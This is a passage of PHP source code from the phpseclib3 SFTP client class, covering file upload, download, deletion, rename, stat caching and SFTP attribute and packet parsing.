Strings::packSSH2('s', $dir)); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED? $this->logError($response, $status); return false; } $this->remove_from_stat_cache($dir); // the following will do a soft delete, which would be useful if you deleted a file // and then tried to do a stat on the deleted file. the above, in contrast, does // a hard delete //$this->update_stat_cache($dir, false); return true; } /** * Uploads a file to the SFTP server. * * By default, \phpseclib3\Net\SFTP::put() does not read from the local filesystem. $data is dumped directly into $remote_file. * So, for example, if you set $data to 'filename.ext' and then do \phpseclib3\Net\SFTP::get(), you will get a file, twelve bytes * long, containing 'filename.ext' as its contents. * * Setting $mode to self::SOURCE_LOCAL_FILE will change the above behavior. With self::SOURCE_LOCAL_FILE, $remote_file will * contain as many bytes as filename.ext does on your local filesystem. If your filename.ext is 1MB then that is how * large $remote_file will be, as well. * * Setting $mode to self::SOURCE_CALLBACK will use $data as callback function, which gets only one parameter -- number * of bytes to return, and returns a string if there is some data or null if there is no more data * * If $data is a resource then it'll be used as a resource instead. * * Currently, only binary mode is supported. As such, if the line endings need to be adjusted, you will need to take * care of that, yourself. * * $mode can take an additional two parameters - self::RESUME and self::RESUME_START. These are bitwise AND'd with * $mode. So if you want to resume upload of a 300mb file on the local file system you'd set $mode to the following: * * self::SOURCE_LOCAL_FILE | self::RESUME * * If you wanted to simply append the full contents of a local file to the full contents of a remote file you'd replace * self::RESUME with self::RESUME_START. * * If $mode & (self::RESUME | self::RESUME_START) then self::RESUME_START will be assumed. * * $start and $local_start give you more fine grained control over this process and take precident over self::RESUME * when they're non-negative. ie. $start could let you write at the end of a file (like self::RESUME) or in the middle * of one. $local_start could let you start your reading from the end of a file (like self::RESUME_START) or in the * middle of one. * * Setting $local_start to > 0 or $mode | self::RESUME_START doesn't do anything unless $mode | self::SOURCE_LOCAL_FILE. * * {@internal ASCII mode for SFTPv4/5/6 can be supported by adding a new function - \phpseclib3\Net\SFTP::setMode().} * * @param string $remote_file * @param string|resource $data * @param int $mode * @param int $start * @param int $local_start * @param callable|null $progressCallback * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \BadFunctionCallException if you're uploading via a callback and the callback function is invalid * @throws \phpseclib3\Exception\FileNotFoundException if you're uploading via a file and the file doesn't exist * @return bool */ public function put($remote_file, $data, $mode = self::SOURCE_STRING, $start = -1, $local_start = -1, $progressCallback = null) { if (!$this->precheck()) { return false; } $remote_file = $this->realpath($remote_file); if ($remote_file === false) { return false; } $this->remove_from_stat_cache($remote_file); if ($this->version >= 5) { $flags = NET_SFTP_OPEN_OPEN_OR_CREATE; } else { $flags = NET_SFTP_OPEN_WRITE | NET_SFTP_OPEN_CREATE; // according to the SFTP specs, NET_SFTP_OPEN_APPEND should "force all writes to append data at the end of the file." // in practice, it doesn't seem to do that. //$flags|= ($mode & self::RESUME) ? NET_SFTP_OPEN_APPEND : NET_SFTP_OPEN_TRUNCATE; } if ($start >= 0) { $offset = $start; } elseif ($mode & (self::RESUME | self::RESUME_START)) { // if NET_SFTP_OPEN_APPEND worked as it should _size() wouldn't need to be called $size = $this->stat($remote_file)['size']; $offset = $size !== false ? $size : 0; } else { $offset = 0; if ($this->version >= 5) { $flags = NET_SFTP_OPEN_CREATE_TRUNCATE; } else { $flags |= NET_SFTP_OPEN_TRUNCATE; } } $this->remove_from_stat_cache($remote_file); $packet = Strings::packSSH2('s', $remote_file); $packet .= $this->version >= 5 ? pack('N3', 0, $flags, 0) : pack('N2', $flags, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: $handle = substr($response, 4); break; case NET_SFTP_STATUS: $this->logError($response); return false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.2.3 $dataCallback = false; switch (true) { case $mode & self::SOURCE_CALLBACK: if (!is_callable($data)) { throw new \BadFunctionCallException("\$data should be is_callable() if you specify SOURCE_CALLBACK flag"); } $dataCallback = $data; // do nothing break; case is_resource($data): $mode = $mode & ~self::SOURCE_LOCAL_FILE; $info = stream_get_meta_data($data); if (isset($info['wrapper_type']) && $info['wrapper_type'] == 'PHP' && $info['stream_type'] == 'Input') { $fp = fopen('php://memory', 'w+'); stream_copy_to_stream($data, $fp); rewind($fp); } else { $fp = $data; } break; case $mode & self::SOURCE_LOCAL_FILE: if (!is_file($data)) { throw new FileNotFoundException("$data is not a valid file"); } $fp = @fopen($data, 'rb'); if (!$fp) { return false; } } if (isset($fp)) { $stat = fstat($fp); $size = !empty($stat) ? $stat['size'] : 0; if ($local_start >= 0) { fseek($fp, $local_start); $size -= $local_start; } elseif ($mode & self::RESUME) { fseek($fp, $offset); $size -= $offset; } } elseif ($dataCallback) { $size = 0; } else { $size = strlen($data); } $sent = 0; $size = $size < 0 ? ($size & 0x7FFFFFFF) + 0x80000000 : $size; $sftp_packet_size = $this->max_sftp_packet; // make the SFTP packet be exactly the SFTP packet size by including the bytes in the NET_SFTP_WRITE packets "header" $sftp_packet_size -= strlen($handle) + 25; $i = $j = 0; while ($dataCallback || ($size === 0 || $sent < $size)) { if ($dataCallback) { $temp = $dataCallback($sftp_packet_size); if (is_null($temp)) { break; } } else { $temp = isset($fp) ? fread($fp, $sftp_packet_size) : substr($data, $sent, $sftp_packet_size); if ($temp === false || $temp === '') { break; } } $subtemp = $offset + $sent; $packet = pack('Na*N3a*', strlen($handle), $handle, $subtemp / 4294967296, $subtemp, strlen($temp), $temp); try { $this->send_sftp_packet(NET_SFTP_WRITE, $packet, $j); } catch (\Exception $e) { if ($mode & self::SOURCE_LOCAL_FILE) { fclose($fp); } throw $e; } $sent += strlen($temp); if (is_callable($progressCallback)) { $progressCallback($sent); } $i++; $j++; if ($i == NET_SFTP_UPLOAD_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { $i = 0; break; } $i = 0; } } $result = $this->close_handle($handle); if (!$this->read_put_responses($i)) { if ($mode & self::SOURCE_LOCAL_FILE) { fclose($fp); } $this->close_handle($handle); return false; } if ($mode & SFTP::SOURCE_LOCAL_FILE) { if (isset($fp) && is_resource($fp)) { fclose($fp); } if ($this->preserveTime) { $stat = stat($data); $attr = $this->version < 4 ? pack('N3', NET_SFTP_ATTR_ACCESSTIME, $stat['atime'], $stat['mtime']) : Strings::packSSH2('NQ2', NET_SFTP_ATTR_ACCESSTIME | NET_SFTP_ATTR_MODIFYTIME, $stat['atime'], $stat['mtime']); if (!$this->setstat($remote_file, $attr, false)) { throw new \RuntimeException('Error setting file time'); } } } return $result; } /** * Reads multiple successive SSH_FXP_WRITE responses * * Sending an SSH_FXP_WRITE packet and immediately reading its response isn't as efficient as blindly sending out $i * SSH_FXP_WRITEs, in succession, and then reading $i responses. * * @param int $i * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ private function read_put_responses($i) { while ($i--) { $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); break; } } return $i < 0; } /** * Close handle * * @param string $handle * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ private function close_handle($handle) { $this->send_sftp_packet(NET_SFTP_CLOSE, pack('Na*', strlen($handle), $handle)); // "The client MUST release all resources associated with the handle regardless of the status." // -- http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.1.3 $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return false; } return true; } /** * Downloads a file from the SFTP server. * * Returns a string containing the contents of $remote_file if $local_file is left undefined or a boolean false if * the operation was unsuccessful. If $local_file is defined, returns true or false depending on the success of the * operation. * * $offset and $length can be used to download files in chunks. * * @param string $remote_file * @param string|bool|resource|callable $local_file * @param int $offset * @param int $length * @param callable|null $progressCallback * @throws \UnexpectedValueException on receipt of unexpected packets * @return string|bool */ public function get($remote_file, $local_file = false, $offset = 0, $length = -1, $progressCallback = null) { if (!$this->precheck()) { return false; } $remote_file = $this->realpath($remote_file); if ($remote_file === false) { return false; } $packet = Strings::packSSH2('s', $remote_file); $packet .= $this->version >= 5 ? pack('N3', 0, NET_SFTP_OPEN_OPEN_EXISTING, 0) : pack('N2', NET_SFTP_OPEN_READ, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: $handle = substr($response, 4); break; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED $this->logError($response); return false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } if (is_resource($local_file)) { $fp = $local_file; $stat = fstat($fp); $res_offset = $stat['size']; } else { $res_offset = 0; if ($local_file !== false && !is_callable($local_file)) { $fp = fopen($local_file, 'wb'); if (!$fp) { return false; } } else { $content = ''; } } $fclose_check = $local_file !== false && !is_callable($local_file) && !is_resource($local_file); $start = $offset; $read = 0; while (true) { $i = 0; while ($i < NET_SFTP_QUEUE_SIZE && ($length < 0 || $read < $length)) { $tempoffset = $start + $read; $packet_size = $length > 0 ? min($this->max_sftp_packet, $length - $read) : $this->max_sftp_packet; $packet = Strings::packSSH2('sN3', $handle, $tempoffset / 4294967296, $tempoffset, $packet_size); try { $this->send_sftp_packet(NET_SFTP_READ, $packet, $i); } catch (\Exception $e) { if ($fclose_check) { fclose($fp); } throw $e; } $packet = null; $read += $packet_size; $i++; } if (!$i) { break; } $packets_sent = $i - 1; $clear_responses = false; while ($i > 0) { $i--; if ($clear_responses) { $this->get_sftp_packet($packets_sent - $i); continue; } else { $response = $this->get_sftp_packet($packets_sent - $i); } switch ($this->packet_type) { case NET_SFTP_DATA: $temp = substr($response, 4); $offset += strlen($temp); if ($local_file === false) { $content .= $temp; } elseif (is_callable($local_file)) { $local_file($temp); } else { fputs($fp, $temp); } if (is_callable($progressCallback)) { call_user_func($progressCallback, $offset); } $temp = null; break; case NET_SFTP_STATUS: // could, in theory, return false if !strlen($content) but we'll hold off for the time being $this->logError($response); $clear_responses = true; // don't break out of the loop yet, so we can read the remaining responses break; default: if ($fclose_check) { fclose($fp); } if ($this->channel_close) { $this->partial_init = false; $this->init_sftp_connection(); return false; } else { throw new \UnexpectedValueException('Expected NET_SFTP_DATA or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } $response = null; } if ($clear_responses) { break; } } if ($fclose_check) { fclose($fp); if ($this->preserveTime) { $stat = $this->stat($remote_file); touch($local_file, $stat['mtime'], $stat['atime']); } } if (!$this->close_handle($handle)) { return false; } // if $content isn't set that means a file was written to return isset($content) ? $content : true; } /** * Deletes a file on the SFTP server. * * @param string $path * @param bool $recursive * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ public function delete($path, $recursive = true) { if (!$this->precheck()) { return false; } if (is_object($path)) { // It's an object. Cast it as string before we check anything else. $path = (string) $path; } if (!is_string($path) || $path == '') { return false; } $path = $this->realpath($path); if ($path === false) { return false; } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.3 $this->send_sftp_packet(NET_SFTP_REMOVE, pack('Na*', strlen($path), $path)); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // if $status isn't SSH_FX_OK it's probably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); if (!$recursive) { return false; } $i = 0; $result = $this->delete_recursive($path, $i); $this->read_put_responses($i); return $result; } $this->remove_from_stat_cache($path); return true; } /** * Recursively deletes directories on the SFTP server * * Minimizes directory lookups and SSH_FXP_STATUS requests for speed. * * @param string $path * @param int $i * @return bool */ private function delete_recursive($path, &$i) { if (!$this->read_put_responses($i)) { return false; } $i = 0; $entries = $this->readlist($path, true); // The folder does not exist at all, so we cannot delete it. if ($entries === NET_SFTP_STATUS_NO_SUCH_FILE) { return false; } // Normally $entries would have at least . and .. but it might not if the directories // permissions didn't allow reading. If this happens then default to an empty list of files. if ($entries === false || is_int($entries)) { $entries = []; } unset($entries['.'], $entries['..']); foreach ($entries as $filename => $props) { if (!isset($props['type'])) { return false; } $temp = $path . '/' . $filename; if ($props['type'] == NET_SFTP_TYPE_DIRECTORY) { if (!$this->delete_recursive($temp, $i)) { return false; } } else { $this->send_sftp_packet(NET_SFTP_REMOVE, Strings::packSSH2('s', $temp)); $this->remove_from_stat_cache($temp); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return false; } $i = 0; } } } $this->send_sftp_packet(NET_SFTP_RMDIR, Strings::packSSH2('s', $path)); $this->remove_from_stat_cache($path); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return false; } $i = 0; } return true; } /** * Checks whether a file or directory exists * * @param string $path * @return bool */ public function file_exists($path) { if ($this->use_stat_cache) { if (!$this->precheck()) { return false; } $path = $this->realpath($path); $result = $this->query_stat_cache($path); if (isset($result)) { // return true if $result is an array or if it's an stdClass object return $result !== false; } } return $this->stat($path) !== false; } /** * Tells whether the filename is a directory * * @param string $path * @return bool */ public function is_dir($path) { $result = $this->get_stat_cache_prop($path, 'type'); if ($result === false) { return false; } return $result === NET_SFTP_TYPE_DIRECTORY; } /** * Tells whether the filename is a regular file * * @param string $path * @return bool */ public function is_file($path) { $result = $this->get_stat_cache_prop($path, 'type'); if ($result === false) { return false; } return $result === NET_SFTP_TYPE_REGULAR; } /** * Tells whether the filename is a symbolic link * * @param string $path * @return bool */ public function is_link($path) { $result = $this->get_lstat_cache_prop($path, 'type'); if ($result === false) { return false; } return $result === NET_SFTP_TYPE_SYMLINK; } /** * Tells whether a file exists and is readable * * @param string $path * @return bool */ public function is_readable($path) { if (!$this->precheck()) { return false; } $packet = Strings::packSSH2('sNN', $this->realpath($path), NET_SFTP_OPEN_READ, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: return true; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED return false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } /** * Tells whether the filename is writable * * @param string $path * @return bool */ public function is_writable($path) { if (!$this->precheck()) { return false; } $packet = Strings::packSSH2('sNN', $this->realpath($path), NET_SFTP_OPEN_WRITE, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: return true; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED return false; default: throw new \UnexpectedValueException('Expected SSH_FXP_HANDLE or SSH_FXP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } /** * Tells whether the filename is writeable * * Alias of is_writable * * @param string $path * @return bool */ public function is_writeable($path) { return $this->is_writable($path); } /** * Gets last access time of file * * @param string $path * @return mixed */ public function fileatime($path) { return $this->get_stat_cache_prop($path, 'atime'); } /** * Gets file modification time * * @param string $path * @return mixed */ public function filemtime($path) { return $this->get_stat_cache_prop($path, 'mtime'); } /** * Gets file permissions * * @param string $path * @return mixed */ public function fileperms($path) { return $this->get_stat_cache_prop($path, 'mode'); } /** * Gets file owner * * @param string $path * @return mixed */ public function fileowner($path) { return $this->get_stat_cache_prop($path, 'uid'); } /** * Gets file group * * @param string $path * @return mixed */ public function filegroup($path) { return $this->get_stat_cache_prop($path, 'gid'); } /** * Recursively go through rawlist() output to get the total filesize * * @return int */ private static function recursiveFilesize(array $files) { $size = 0; foreach ($files as $name => $file) { if ($name == '.' || $name == '..') { continue; } $size += is_array($file) ? self::recursiveFilesize($file) : $file->size; } return $size; } /** * Gets file size * * @param string $path * @param bool $recursive * @return mixed */ public function filesize($path, $recursive = false) { return !$recursive || $this->filetype($path) != 'dir' ? $this->get_stat_cache_prop($path, 'size') : self::recursiveFilesize($this->rawlist($path, true)); } /** * Gets file type * * @param string $path * @return string|false */ public function filetype($path) { $type = $this->get_stat_cache_prop($path, 'type'); if ($type === false) { return false; } switch ($type) { case NET_SFTP_TYPE_BLOCK_DEVICE: return 'block'; case NET_SFTP_TYPE_CHAR_DEVICE: return 'char'; case NET_SFTP_TYPE_DIRECTORY: return 'dir'; case NET_SFTP_TYPE_FIFO: return 'fifo'; case NET_SFTP_TYPE_REGULAR: return 'file'; case NET_SFTP_TYPE_SYMLINK: return 'link'; default: return false; } } /** * Return a stat properity * * Uses cache if appropriate. * * @param string $path * @param string $prop * @return mixed */ private function get_stat_cache_prop($path, $prop) { return $this->get_xstat_cache_prop($path, $prop, 'stat'); } /** * Return an lstat properity * * Uses cache if appropriate. * * @param string $path * @param string $prop * @return mixed */ private function get_lstat_cache_prop($path, $prop) { return $this->get_xstat_cache_prop($path, $prop, 'lstat'); } /** * Return a stat or lstat properity * * Uses cache if appropriate. * * @param string $path * @param string $prop * @param string $type * @return mixed */ private function get_xstat_cache_prop($path, $prop, $type) { if (!$this->precheck()) { return false; } if ($this->use_stat_cache) { $path = $this->realpath($path); $result = $this->query_stat_cache($path); if (is_object($result) && isset($result->$type)) { return $result->{$type}[$prop]; } } $result = $this->$type($path); if ($result === false || !isset($result[$prop])) { return false; } return $result[$prop]; } /** * Renames a file or a directory on the SFTP server. * * If the file already exists this will return false * * @param string $oldname * @param string $newname * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ public function rename($oldname, $newname) { if (!$this->precheck()) { return false; } $oldname = $this->realpath($oldname); $newname = $this->realpath($newname); if ($oldname === false || $newname === false) { return false; } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.3 $packet = Strings::packSSH2('ss', $oldname, $newname); if ($this->version >= 5) { /* quoting https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-05#section-6.5 , 'flags' is 0 or a combination of: SSH_FXP_RENAME_OVERWRITE 0x00000001 SSH_FXP_RENAME_ATOMIC 0x00000002 SSH_FXP_RENAME_NATIVE 0x00000004 (none of these are currently supported) */ $packet .= "\0\0\0\0"; } $this->send_sftp_packet(NET_SFTP_RENAME, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // if $status isn't SSH_FX_OK it's probably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return false; } // don't move the stat cache entry over since this operation could very well change the // atime and mtime attributes //$this->update_stat_cache($newname, $this->query_stat_cache($oldname)); $this->remove_from_stat_cache($oldname); $this->remove_from_stat_cache($newname); return true; } /** * Parse Time * * See '7.7. Times' of draft-ietf-secsh-filexfer-13 for more info. * * @param string $key * @param int $flags * @param string $response * @return array */ private function parseTime($key, $flags, &$response) { $attr = []; list($attr[$key]) = Strings::unpackSSH2('Q', $response); if ($flags & NET_SFTP_ATTR_SUBSECOND_TIMES) { list($attr[$key . '-nseconds']) = Strings::unpackSSH2('N', $response); } return $attr; } /** * Parse Attributes * * See '7. File Attributes' of draft-ietf-secsh-filexfer-13 for more info. * * @param string $response * @return array */ protected function parseAttributes(&$response) { if ($this->version >= 4) { list($flags, $attr['type']) = Strings::unpackSSH2('NC', $response); } else { list($flags) = Strings::unpackSSH2('N', $response); } foreach (self::$attributes as $key => $value) { switch ($flags & $key) { case NET_SFTP_ATTR_UIDGID: if ($this->version > 3) { continue 2; } break; case NET_SFTP_ATTR_CREATETIME: case NET_SFTP_ATTR_MODIFYTIME: case NET_SFTP_ATTR_ACL: case NET_SFTP_ATTR_OWNERGROUP: case NET_SFTP_ATTR_SUBSECOND_TIMES: if ($this->version < 4) { continue 2; } break; case NET_SFTP_ATTR_BITS: if ($this->version < 5) { continue 2; } break; case NET_SFTP_ATTR_ALLOCATION_SIZE: case NET_SFTP_ATTR_TEXT_HINT: case NET_SFTP_ATTR_MIME_TYPE: case NET_SFTP_ATTR_LINK_COUNT: case NET_SFTP_ATTR_UNTRANSLATED_NAME: case NET_SFTP_ATTR_CTIME: if ($this->version < 6) { continue 2; } } switch ($flags & $key) { case NET_SFTP_ATTR_SIZE: // 0x00000001 // The size attribute is defined as an unsigned 64-bit integer. // The following will use floats on 32-bit platforms, if necessary. // As can be seen in the BigInteger class, floats are generally // IEEE 754 binary64 "double precision" on such platforms and // as such can represent integers of at least 2^50 without loss // of precision. Interpreted in filesize, 2^50 bytes = 1024 TiB. list($attr['size']) = Strings::unpackSSH2('Q', $response); break; case NET_SFTP_ATTR_UIDGID: // 0x00000002 (SFTPv3 only) list($attr['uid'], $attr['gid']) = Strings::unpackSSH2('NN', $response); break; case NET_SFTP_ATTR_PERMISSIONS: // 0x00000004 list($attr['mode']) = Strings::unpackSSH2('N', $response); $fileType = $this->parseMode($attr['mode']); if ($this->version < 4 && $fileType !== false) { $attr += ['type' => $fileType]; } break; case NET_SFTP_ATTR_ACCESSTIME: // 0x00000008 if ($this->version >= 4) { $attr += $this->parseTime('atime', $flags, $response); break; } list($attr['atime'], $attr['mtime']) = Strings::unpackSSH2('NN', $response); break; case NET_SFTP_ATTR_CREATETIME: // 0x00000010 (SFTPv4+) $attr += $this->parseTime('createtime', $flags, $response); break; case NET_SFTP_ATTR_MODIFYTIME: // 0x00000020 $attr += $this->parseTime('mtime', $flags, $response); break; case NET_SFTP_ATTR_ACL: // 0x00000040 // access control list // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-04#section-5.7 // currently unsupported list($count) = Strings::unpackSSH2('N', $response); for ($i = 0; $i < $count; $i++) { list($type, $flag, $mask, $who) = Strings::unpackSSH2('N3s', $result); } break; case NET_SFTP_ATTR_OWNERGROUP: // 0x00000080 list($attr['owner'], $attr['$group']) = Strings::unpackSSH2('ss', $response); break; case NET_SFTP_ATTR_SUBSECOND_TIMES: // 0x00000100 break; case NET_SFTP_ATTR_BITS: // 0x00000200 (SFTPv5+) // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-05#section-5.8 // currently unsupported // tells if you file is: // readonly, system, hidden, case inensitive, archive, encrypted, compressed, sparse // append only, immutable, sync list($attrib_bits, $attrib_bits_valid) = Strings::unpackSSH2('N2', $response); // if we were actually gonna implement the above it ought to be // $attr['attrib-bits'] and $attr['attrib-bits-valid'] // eg. - instead of _ break; case NET_SFTP_ATTR_ALLOCATION_SIZE: // 0x00000400 (SFTPv6+) // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.4 // represents the number of bytes that the file consumes on the disk. will // usually be larger than the 'size' field list($attr['allocation-size']) = Strings::unpackSSH2('Q', $response); break; case NET_SFTP_ATTR_TEXT_HINT: // 0x00000800 // https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.10 // currently unsupported // tells if file is "known text", "guessed text", "known binary", "guessed binary" list($text_hint) = Strings::unpackSSH2('C', $response); // the above should be $attr['text-hint'] break; case NET_SFTP_ATTR_MIME_TYPE: // 0x00001000 // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.11 list($attr['mime-type']) = Strings::unpackSSH2('s', $response); break; case NET_SFTP_ATTR_LINK_COUNT: // 0x00002000 // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.12 list($attr['link-count']) = Strings::unpackSSH2('N', $response); break; case NET_SFTP_ATTR_UNTRANSLATED_NAME:// 0x00004000 // see https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.13 list($attr['untranslated-name']) = Strings::unpackSSH2('s', $response); break; case NET_SFTP_ATTR_CTIME: // 0x00008000 // 'ctime' contains the last time the file attributes were changed. The // exact meaning of this field depends on the server. $attr += $this->parseTime('ctime', $flags, $response); break; case NET_SFTP_ATTR_EXTENDED: // 0x80000000 list($count) = Strings::unpackSSH2('N', $response); for ($i = 0; $i < $count; $i++) { list($key, $value) = Strings::unpackSSH2('ss', $response); $attr[$key] = $value; } } } return $attr; } /** * Attempt to identify the file type * * Quoting the SFTP RFC, "Implementations MUST NOT send bits that are not defined" but they seem to anyway * * @param int $mode * @return int */ private function parseMode($mode) { // values come from http://lxr.free-electrons.com/source/include/uapi/linux/stat.h#L12 // see, also, http://linux.die.net/man/2/stat switch ($mode & 0170000) {// ie. 1111 0000 0000 0000 case 0000000: // no file type specified - figure out the file type using alternative means return false; case 0040000: return NET_SFTP_TYPE_DIRECTORY; case 0100000: return NET_SFTP_TYPE_REGULAR; case 0120000: return NET_SFTP_TYPE_SYMLINK; // new types introduced in SFTPv5+ // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-05#section-5.2 case 0010000: // named pipe (fifo) return NET_SFTP_TYPE_FIFO; case 0020000: // character special return NET_SFTP_TYPE_CHAR_DEVICE; case 0060000: // block special return NET_SFTP_TYPE_BLOCK_DEVICE; case 0140000: // socket return NET_SFTP_TYPE_SOCKET; case 0160000: // whiteout // "SPECIAL should be used for files that are of // a known type which cannot be expressed in the protocol" return NET_SFTP_TYPE_SPECIAL; default: return NET_SFTP_TYPE_UNKNOWN; } } /** * Parse Longname * * SFTPv3 doesn't provide any easy way of identifying a file type. You could try to open * a file as a directory and see if an error is returned or you could try to parse the * SFTPv3-specific longname field of the SSH_FXP_NAME packet. That's what this function does. * The result is returned using the * {@link http://tools.ietf.org/html/draft-ietf-secsh-filexfer-04#section-5.2 SFTPv4 type constants}. * * If the longname is in an unrecognized format bool(false) is returned. * * @param string $longname * @return mixed */ private function parseLongname($longname) { // http://en.wikipedia.org/wiki/Unix_file_types // http://en.wikipedia.org/wiki/Filesystem_permissions#Notation_of_traditional_Unix_permissions if (preg_match('#^[^/]([r-][w-][xstST-]){3}#', $longname)) { switch ($longname[0]) { case '-': return NET_SFTP_TYPE_REGULAR; case 'd': return NET_SFTP_TYPE_DIRECTORY; case 'l': return NET_SFTP_TYPE_SYMLINK; default: return NET_SFTP_TYPE_SPECIAL; } } return false; } /** * Sends SFTP Packets * * See '6. General Packet Format' of draft-ietf-secsh-filexfer-13 for more info. * * @param int $type * @param string $data * @param int $request_id * @see self::_get_sftp_packet() * @see self::send_channel_packet() * @return void */ private function send_sftp_packet($type, $data, $request_id = 1) { // in SSH2.php the timeout is cumulative per function call. eg. exec() will // timeout after 10s. but for SFTP.php it's cumulative per packet $this->curTimeout = $this->timeout; $packet = $this->use_request_id ? pack('NCNa*', strlen($data) + 5, $type, $request_id, $data) : pack('NCa*', strlen($data) + 1, $type, $data); $start = microtime(true); $this->send_channel_packet(self::CHANNEL, $packet); $stop = microtime(true); if (defined('NET_SFTP_LOGGING')) { $packet_type = '-> ' . self::$packet_types[$type] . ' (' . round($stop - $start, 4) . 's)'; $this->append_log($packet_type, $data); } } /** * Resets a connection for re-use * * @param int $reason */ protected function reset_connection($reason) { parent::reset_connection($reason); $this->use_request_id = false; $this->pwd = false; $this->requestBuffer = []; $this->partial_init = false; } /** * Receives SFTP Packets * * See '6. General Packet Format' of draft-ietf-secsh-filexfer-13 for more info. * * Incidentally, the number of SSH_MSG_CHANNEL_DATA messages has no bearing on the number of SFTP packets present. * There can be one SSH_MSG_CHANNEL_DATA messages containing two SFTP packets or there can be two SSH_MSG_CHANNEL_DATA * messages containing one SFTP packet. * * @see self::_send_sftp_packet() * @return string */ private function get_sftp_packet($request_id = null) { $this->channel_close = false; if (isset($request_id) && isset($this->requestBuffer[$request_id])) { $this->packet_type = $this->requestBuffer[$request_id]['packet_type']; $temp = $this->requestBuffer[$request_id]['packet']; unset($this->requestBuffer[$request_id]); return $temp; } // in SSH2.php the timeout is cumulative per function call. eg. exec() will // timeout after 10s. but for SFTP.php it's cumulative per packet $this->curTimeout = $this->timeout; $start = microtime(true); // SFTP packet length while (strlen($this->packet_buffer) < 4) { $temp = $this->get_channel_packet(self::CHANNEL, true); if ($temp === true) { if ($this->channel_status[self::CHANNEL] === NET_SSH2_MSG_CHANNEL_CLOSE) { $this->channel_close = true; } $this->packet_type = false; $this->packet_buffer = ''; return false; } $this->packet_buffer .= $temp; } if (strlen($this->packet_buffer) < 4) { throw new \RuntimeException('Packet is too small'); } extract(unpack('Nlength', Strings::shift($this->packet_buffer, 4))); /** @var integer $length */ $tempLength = $length; $tempLength -= strlen($this->packet_buffer); // 256 * 1024 is what SFTP_MAX_MSG_LENGTH is set to in OpenSSH's sftp-common.h if (!$this->allow_arbitrary_length_packets && !$this->use_request_id && $tempLength > 256 * 1024) { throw new \RuntimeException('Invalid Size'); } // SFTP packet type and data payload while ($tempLength > 0) { $temp = $this->get_channel_packet(self::CHANNEL, true); if ($temp === true) { if 